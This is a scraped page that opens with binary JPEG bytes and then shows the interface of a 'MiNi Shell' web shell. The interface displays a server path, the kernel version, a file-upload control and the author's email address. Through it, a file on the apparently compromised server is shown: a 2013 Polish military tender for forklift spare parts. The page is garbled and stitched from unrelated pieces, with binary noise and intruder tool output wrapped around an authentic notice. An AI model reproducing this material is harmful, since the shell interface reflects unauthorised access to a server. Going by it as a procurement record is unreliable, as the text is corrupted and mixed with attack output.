JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130823/168083-N-2013.html

<p class="kh_header"><b>Kraków: Dostawa częsci zamiennych do sprzętu przeładunkowego</b><br>
<b>Numer ogłoszenia: 168083 - 2013; data zamieszczenia: 23.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4228 , ul. Montelupich 3, 30-901 Kraków, woj. małopolskie, tel. 12 455 75 53, faks 12 455 75 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.3rblog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa częsci zamiennych do sprzętu przeładunkowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do sprzętu przeładunkowego  obejmująca swym zakresem 7 zadań tj:
Zadanie nr 1 - Części zamienne do podnośników typu GPW
Zadanie nr 2 - Części zamienne do podnośnika HELI CPCD40-RW19	
Zadanie nr 3 -Części zamienne różne	
Zadanie nr 4 - Części zamienne do podnośnika KALMAR 
DCD 200-12LB (prod. 1999r)	
Zadanie nr 5 - Części zamienne do podnośnika BALKANCAR	
Zadanie nr 6 - Części zamienne do podnośnika LUNA TH20-1200	
Zadanie nr 7 - Części zamienne modułowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony druk OFERTA, 2. Wypełniony formularz cenowy w zakresie zadań, których realizację wykonawca zaoferuje, Formularz cenowy musi zawierać wypełnione wszystkie pozycje  asortymentowe dla danego zadania, w przeciwnym wypadku oferta będzie podlegała odrzuceniu jako niezgodna z treścią SIWZ, 3. Oryginał lub kopię pełnomocnictwa:
a) dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. z aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, odpisu z właściwego rejestru). 
b) dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu  albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie.
Wszystkie dokumenty wymagane przez zamawiającego muszą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustaw, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy Pzp dopuszcza możliwość dokonywania stosownych zmian w umowie na mocy porozumienia stron, w następujących przypadkach:
1. zmiany Odbiorcy;
2. zmiany terminu wykonania umowy - w przypadku, gdy z powodu siły wyższej nie jest możliwe wykonanie przedmiotu umowy w umówionym terminie;
3. przedłużenia terminu wykonywania umowy o okres nie dłuższy niż okres trwania postępowania odwoławczego przed Krajową Izbą Odwoławczą lub sądem powszechnym - w przypadku, gdy zostało wniesione odwołanie w postępowaniu o udzielenie zamówienia publicznego;
4. zmiany wynagrodzenia - w przypadku zmiany przepisów prawnych (np. zmiana stawki podatku VAT), jeżeli wpływają one na wysokość należnego wykonawcy wynagrodzenia - zgodnie ze zmienionymi przepisami;
5. zmiany przedmiotu umowy - gdy przedmiot umowy nie będzie dostępny na rynku z powodu zaprzestania jego produkcji, pod warunkiem, że produkt zamienny spełnia wymagania zawarte w SIWZ oraz pod warunkiem, że cena nie ulegnie podwyższeniu;
6. w innych przypadkach - jeżeli ich zmiana jest konieczna w związku ze zmianą przepisów prawa, zmianą decyzji wydawanych przez Ministra Obrony Narodowej bądź zmiany wytycznych przełożonych Zamawiającego o ile powyższe zmiany mają wpływ na wykonanie zawartej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.3rblog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4228, 30-901 Kraków, ul. Montelupich 3 , bud. 28, pok. 24 - Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2013 godzina 10:00, miejsce: Jednostka Wojskowa 4228, 30-901 Kraków, ul. Montelupich 3 , bud. 28- kancelaria jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa części zamiennych do podnośników typu GPW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośników typu GPW, tj. 1). CZĘŚCI DO PODNOŚNIKA GPW 202: 1 FILTR PALIWA, 2 FILTR OLEJU.
2). CZĘŚCI DO PODNOŚNIKA GPW 400T: 1 USZCZELKA, 2. ZAWÓR, 3 ŻARÓWKA SAMOCHODOWA. 3) CZĘŚCI DO PODNOŚNIKA GPW 2010: 1. FILTR OLEJU HYDRAULICZNEGO. 4). CZĘŚCI DO PODNOŚNIKA GPW 2007 2009: 1. ALTERNATOR 14V 55A (GPW 2007), 2. AUTOMAT ROZRUSZNIKA, 3. CZUJNIK TEMPER. WODY, 4. FILTR PALIWA, 5. POMPA HAMULCOWA, 6. FILTR HYDRAULICZNY, 7. FILTR OLEJU, 8. FILTR POWIETRZA, 9. WKŁAD FILTRA OLEJU HYDRAUL., 10. FILTR OLEJU (GPW 2009), 11. FILTR KOMPLET, 12. FILTR POWIETRZA, 13. USZCZELKA GŁOWICY SILNIKA, 14. USZCZELKA TERMOSTATU.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika  HELI CPCD40-RW19,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika HELI CPCD40-RW19, tj.: 1. FILTR POWIETRZA zewn., 2. FILTR POWIETRZA wkład, 3. FILTR PALIWA, 4.	FILTR HYDRAULICZNY ssący, 5. FILTR HYDRAULICZNY powrotny, 6. FILTR OLEJU SILNIKA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa części zamiennych różnych do sprzętu przeładunkowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych różnych do sprzętu przeładunkowego, tj.: 1) CZĘŚCI DO PODNOŚNIKA SPALINOWEGO RAK: 1. FILTR OLEJU RAK 2A, 2. DŻWIGNIA UKŁADU KIEROWNICZEGO, 3. LICZNIK MOTOGODZIN, 4. LAMPKA KONTROLNA CZERWONA, 5. OSŁONA DŻWIGNI ZMIANY BIEGÓW, 6. OSŁONA SPRZĘGŁA, 7. ZWROTNICA PRAWA, 8. KOŃCÓWKA DRĄŻKA. 2). CZĘŚCI ZAMIENNE DO WÓZKA TRANSPORTOWEGO WNA 1320: 1. POMPA HAMULCOWA JEDNOSTOPN., 2. SILNIK ELEKTRYCZNY, 3. SPRZĘGŁO, 4. SZCZĘKA HAMULCA RĘCZNEGO, 5. CYLINDER GŁÓWN, 6. PIERŚCIEŃ DOCISKOWY, 7. WYŁĄCZNIK GŁÓWNY, 8. ŚLIMAK, 9. WYŁĄCZNIK ZAPŁONU/STACYJKA WZ-60, 10. ZWROTNICA PRAWA, 11. ZWROTNICA LEWA, 12. CYLINDER ROZPIERAJĄCY, 13. CYLINDEREK HAMULCOWY. 3). CZĘŚCI ZAMIENNE DO WÓZKA TRANSPORTOWEGO AKUMULATOROWEGO MELEX-667: 1. KOLUMNA KIEROWNICZA KOMPLETNA..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika KALMAR DCD 200-12LB (prod. 1999 r.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika KALMAR DCD 200-12LB (prod. 1999 r.), tj.: 1. FILTR BEZPIECZEŃSTWA, 2. FILTR ODPOWIETRZENIA, 3. FILTR OLEJU, 4. FILTR PALIWA, 5. FILTR POWIETRZA, 6. FILTR SIATKOWY, 7. FILTR WYSOKIEGO CIŚNIENIA..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika BALKANCAR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika BALKANCAR, tj.: 1. WKŁAD FILTRA POWIETRZA SUCHY, 2. NAKRĘTKA SPECJALNA, 3. USZCZELNIENIE, 4. SWORZEŃ ZWROTNICY, 5. ŚRUBA SPECJALNA, 6. ŁOŻYSKO PRZEGUBOWE, 7. POKRYWA OCHRONNA, 8. ŁOŻYSKO 33206, 9. ŁOŻYSKO 32206, 10. USZCZELNIENIE, 11. PÓŁOŚ, 12. TULEJA, 13. LAMPA ZESPOLONA TYLNA LEWA, 14. LAMPA ZESPOLONA TYLNA PRAWA, 15. TERMOSTAT UKŁADU CHŁODZENIA, 16. USZCZELKA POKRYWY GŁOWICY, 17. USZCZELKA KOLEKTORA SSĄCEGO, 18. ELEKTROZAWÓR POMPY WTRYSKOWEJ, 19. WKŁAD FILTRA POWIETRZA SUCHY..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa części zamiennych do podnośnika LUNA TH20-1200.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych do podnośnika LUNA TH20-1200, tj.: 1. ZAWÓR GŁÓWNY, 2. PANEL STEROWANIA..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa części zamiennych modułowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych modułowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com